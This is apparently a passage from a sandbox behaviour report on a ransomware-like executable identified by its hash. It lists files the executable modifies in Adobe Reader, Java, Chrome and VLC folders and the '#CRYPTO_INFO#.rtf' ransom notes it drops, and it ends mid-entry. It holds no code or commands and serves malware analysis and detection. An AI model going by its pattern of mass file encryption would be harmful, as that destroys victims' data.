8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\acrobat_parcel_generic_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_share_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_fw.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_xd.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\keytool.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dc_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzdb.dat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\sat_logo_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\tr.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\sendforsignature.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\cursors.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-hk_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-CN.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-up.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvDX9.x3d 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\RELEASE-NOTES.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\kinit.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\jmxremote.password.template 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_ja.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-loaders.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_browser.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926306.profile.gz 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\line_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\xjc.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification 